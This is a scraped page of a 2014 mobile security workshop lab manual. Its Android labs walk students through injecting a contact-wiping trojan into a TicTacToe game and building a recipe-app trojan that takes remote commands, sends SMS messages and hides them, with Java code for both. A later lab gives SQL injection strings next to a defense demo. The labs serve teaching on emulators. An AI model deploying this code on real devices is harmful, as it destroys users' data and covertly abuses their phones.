[Type the company name] nsf mobile Security Workshop 2014


Lab 3 Malware Game – Step by Step demonstration



Download 312.97 Kb.
Page4/4
Date29.06.2017
Size312.97 Kb.
#21981
1   2   3   4

Lab 3 Malware Game – Step by Step demonstration


In this lab, we will practice the injection of malicious code into a benign TicTacToe Game. The malicious code will periodically erase all the contacts on device.
Step 1: Start an emulator and Add Contacts
In Eclipse, follow the steps in the screenshot below to start an Emulator using AVD “Test”

The emulator may take several minutes to start.

After it starts, click the button in the middle to check the installed apps on device.



Click “Contacts” to check the contact list on device.


In the beginning, the contact list is empty, and we can first click the “Menu” in the right panel, and then click the “New Contact” button to create new contacts.




Enter the name for a new contact and press done.




Now, you shall see the new contact in your contact list.

Step 2: Load benign TicTaeToe Game into Eclipse
The eclipse project “MalTicTaeToe” under the folder

“\Lab3\Before Injecting Malicious Code\”

contains a benign TicTaeToe game. Import the project into eclipse.

In eclipse, click “File” -> “Import”




In the “Import” dialog, select “Android” -> “Existing Android Code into Workspace”, and then click “Next”

Browse to the foler of “MalTicTacToe” under “Lab3\Before Injecting Malicious Code\”.

Check “Copy Projects into workspace” and Click “Finish” to complete the import.



The imported project would look like the screenshot below.


Step 3: Install the benign TicTacToe to the emulator

The Game will automatically start, and you can play the TicTacToe game


Check the contact list (refer to Step 1), the previously created contact should still exist.

Close the emulator and start it again; the contact list should remain unchanged.



Step 4: Inject Malicious Code
Open the configuration file: AndroidManifest.xml

Add permission requests (orange color) and two Receiver components (blue color) to the AndroidManifest.xml
Code 3.1


package="android.trojangame"

android:versionCode="1"

android:versionName="1.0" >


android:minSdkVersion="8"

android:targetSdkVersion="10" />





android:allowBackup="true"

android:icon="@drawable/ic_launcher"

android:label="@string/app_name"

android:theme="@style/AppTheme" >

android:name="edu.mobilesecuritylabware.malware.maltictactoe.tictactoe.MainActivity"

android:label="@string/app_name" >
























Next, we will add the java code for the two new components.

Create a new package with the name “edu.mobilesecuritylabware.malware.maltictactoe.trojan”






Add a new Java class “RunTrojan” to the new package




Repeat the same steps to add another class “StartAttack” to the new package.


Replace the code in RunTrojan.java with Code 3.2
Code 3.2
package edu.mobilesecuritylabware.malware.maltictactoe.trojan;
import android.app.Activity;
import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.provider.ContactsContract;
import android.util.Log;

public class RunTrojan extends BroadcastReceiver{


@Override


public void onReceive(Context context, Intent intent) {
Log.i("LOG", "deleteContacts");
ContentResolver contentResolver = context.getContentResolver();
Cursor cursor = contentResolver.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
while (cursor.moveToNext()) {
String lookupKey = cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT_LOOKUP_URI, lookupKey);
Log.i("LOG", uri.toString());
contentResolver.delete(uri, null, null);
}

}
}

Replace the code in StartAttack.java with Code 3.3
Code 3.3
package edu.mobilesecuritylabware.malware.maltictactoe.trojan;
import java.util.Calendar;

import android.app.AlarmManager;


import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;

public class StartAttack extends BroadcastReceiver {


private static final long TIME = 5000;//??how long?
Calendar cal=Calendar.getInstance();
private static int count=0;
@Override
public void onReceive(Context context, Intent arg1) {
Log.i("StartAttack", "onReceive");
AlarmManager service = (AlarmManager) context
.getSystemService(Context.ALARM_SERVICE);
Intent i = new Intent(context, RunTrojan.class);
PendingIntent pending = PendingIntent.getBroadcast(context, 0, i,
PendingIntent.FLAG_CANCEL_CURRENT);
service.setInexactRepeating(AlarmManager.RTC_WAKEUP,
cal.getTimeInMillis(), TIME, pending);
Log.i("StartAttack", count++ +" times");
}

}

Step 5. Removed Previously Installed Benign TicTacToe


In emulator, open the “Settings” -> “Applications” -> “Manage Applications” -> “TrojanGame” -> “Uninstall”




Step 6. Install the TicTacToe with the malicious code
In eclipse, install the MalTicTacToe to the emulator (refer to Step 3)

After the installation, the main activity of malicious TicTactoe will be invoked.

Play the game and exit the game.

Check the contacts. The contact list should remain unchanged.



Close the emulator and start the emulator again.

Check the contacts. All contacts shall be removed.



You can add contact again (refer to Step 1) and they shall be quickly removed.


Lab 4 Malware-Trojan


Objective

In this lab, we will develop an Android Trojan from scratch to demonstrate the concept of Mobile Malware on Android platform. The main functionality of this Android Trojan is sending text messages to others according to a hacker's commands. In order to make the user unconscious of the malicious activities, this Trojan will delete all the messaging history. The diagram below illustrates the work flow of this Android Trojan.

trojan diagram

Special Notice



The Android Trojan developed in this lab is for education purpose. Readers should perform gracefully based on hacking ethics and should not spread or utilize the code in this lab to harm other Android phone users to gain their own benefits. A more thorough specification of hacking ethics can be found here and here. Please read them carefully.

The Development of the Android Trojan


The appearance of this Trojan is an introduction to an Asian dish, Hong Shao Shi Zi Tou. We assume that the victim is interested in Asian food and she has downloaded this app carelessly. 
When the victim activates the application, the Trojan will send a notification to the hacker, which encodes the information of the user's IP address and a port number for malicious communication. Then, the Trojan and the hacker are able to set up a TCP/IP communication channel, via which the hacker can send commands to the Trojan on victim's device. When receive a command from the hacker, the Trojan will analyze the data packet, abstract the target users' phone numbers and the content of the malicious message, and finally send the malicious messages to the target phone users. After sending text messages, the Trojan will delete the messaging history. If the target phone users send complaint messages back to user, the Trojan will stop the arriving of those complaint messages to the users' phone. 
Step 1:

Start Eclipse. Import the pre-lab 4.

  • Click file import.

  • Browse to the directory of downloads.

  • Select Lab 4

  • Pre-lab 4 is located under the Lab 4 folder.

Step 2:

  • Go to MailRecipe

  • Open the Src file

  • Open the edu.mobilesecuritylabware.malware.malrecipe.attack

  • Open the class MainActivity.java

  • Go to the method called startServer()

  • Paste the content of the following code, lab4.1, into the area marked with comments that tells you to paste here. Do not include the line Code 4.1.

Code 4.1

serverSocket = new ServerSocket(PORT);
            //mSocket=new Socket(SERVER,PORT);
            while (true) {
                Socket client = serverSocket.accept();
                Log.i("VICTIM", "visting..");
                try {
                    // Log.i("hehheh", "visting..");
                    BufferedReader in = new BufferedReader(
                            new InputStreamReader(client.getInputStream()));
                    String str = in.readLine();
                    String[] tempMessage = str.split("#");
                    String phoneNo = tempMessage[0];
                    String message = tempMessage[1];
                    Log.i("AndroidServer", "No:" + phoneNo + " message:"
                            + message);
                    // Toast.makeText(MainActivity.this,"No:"+phoneNo+" message:"+message,
                    // Toast.LENGTH_SHORT).show();
                    sendSMS(phoneNo, message);// send message to target
                    deleteSMS();
                } catch (Exception e) {
                    e.printStackTrace();
                } finally {
                    client.close();
                }
                Thread.sleep(1000);
            }

After step 2 look like this.



Step3:

  • Go to MailRecipe

  • Open the Src file

  • Open the edu.mobilesecuritylabware.malware.malrecipe.attack

  • Open the class SMSReceiver.java

  • Paste the following code, Code 4.2, into the area marked with comments that tell you to paste here. Do not include the line Code 4.2.

Code 4.2

public void onReceive(Context context, Intent intent) {


         Log.i("SMSReceiver, isOrderedBroadcast()="
                    ,""+isOrderedBroadcast());
        String action = intent.getAction();
        if (SMS_RECEIVED_ACTION.equals(action)) {
            Bundle bundle = intent.getExtras();
            if (bundle != null) {
                Object[] pdus = (Object[]) bundle.get("pdus");
                for (Object pdu : pdus) {
                    SmsMessage message = SmsMessage.createFromPdu((byte[]) pdu);
                    String sender = message.getOriginatingAddress();
                    if (sender!=null&&sender.equals("15555215556")) {
                        //deleteSMS(context,sender);
                        abortBroadcast();
                    }
                    return;
                }
            }
            abortBroadcast();
        }
    }

This is what you will have in SMSReceiver.java after step 3





Step 4:

  • Go to AndroidManifest.xml file

  • Open the AndroidManifest.xml file

  • Paste the following code, Code 4.3, into the area marked with comments that tell you to paste here. Do not include the line Code 4.3.

Code 4.3.
             android:permission="android.permission.BROADCAST_SMS"
             > 

             

                 

             

 
You screen should look like this after step 4.


Lab 4 Step-by-Step Demonstration


Step 1: start two emulators

In eclipse, open the “Android Virtual Device (AVD) Manager” by clicking , and two virtual devices ( “Test” and “Test2”) have been created.

Select “Test” and click “Start” button to start the emulator “Test”.

Select “Test2” and click “Start” button to start the emulator “Test2”.



Since we start the emulator “Test” first, it will be assigned with port “5554”, and the other emulator “Test2” will be assigned with port “5556”.




Step 2: install the Malrecipe app in emulator “5554:Test”

In eclipse,



By default, MalRecipe will be installed to the first emulator, which is “5554:Test”.


After the installation, we will see the Malrecipe app installed with the app name “Trojan”.



Start Malrecipe by clicking the app “Trojan”



After start the app, MalRecipe starts to listen to the port “7777” of Emulator “5554:Test”

Step 3: Start the MalRecipeServer

In eclipse, start the “MalRecipeServer” as a Java Appilcation





And the GUI of MalRecipeServer will look like this



In order for the MalRecipeServer to be able to connect to the port “7777” in emulator “5554:Test”, a tcp redirection will need to be set up.

Open PuTTy




Telnet to the emulator “5554:Test”



The following window will appear


Enter the command “redir add tcp:7777:7777”



Step 5: Attacking

In MalRecipeServer, enter the message to be sent through “5554:Test” to “5556:Test2”



Click “Attack”. If succeed, a message will be shown.


Checking the SMS in two emulators. We can see that “5556:Test2” received a message from “5554:Test”, however, “5554:Test” had no record of sending the message.


Lab 5 Database Security

SQL injection and defense


In this tutorial, we will create a simple SQL injection application which based on the concept of SQLite Databases of Android. By doing this exercise, students will get a better understanding about the security vulnerabilities in database.

Objective



In Android, we have five types of way for Data Storage (Shared Preferences, Internal Storage, External Storage, SQLite Databases, Network Connection). Our goal is to fully understand the way of SQLite Databases used to store structured data in a private database and how SQL injection can be performed.

Software Requirement

Eclipse IDE

Android SDK

Tutorial

Open Eclipse

Import lab 5 from the downloads folder

Launch an emulator

Select SQLInjection app from the list on the left

Click RunAs Android Application



Slide to unlock phone

The following should show on your phone.



Click the View Injection Demo button.

When you see this screen, type 1’ or ‘1’=’1 into the Input the user ID: field.



Click Search

You should see the following results


Now click the back button to return to the original screen.

In the Input the user ID: field type 1’ or username not null –

Click the Search button again and you should view the following:

To demonstrate the defense:

Click the back button to return to the original screen.



Now, click on the View Defense Demo

You should again reach the screen where you are asked to input the user ID.

We will now try to again enter 1’ or ‘1’=’1 in the Input the user ID: field.

When you run this time, the operation will fail and you should see the following results.

Notice that you were not able to capture the information.



You can click back and repeat the exercise using the 1’ or username not null – as the id.
For the code that performs all of these operations and an explanation, please see the bound workshop manual.

Download 312.97 Kb.

Share with your friends:
1   2   3   4




The database is protected by copyright ©ininet.org 2024
send message

    Main page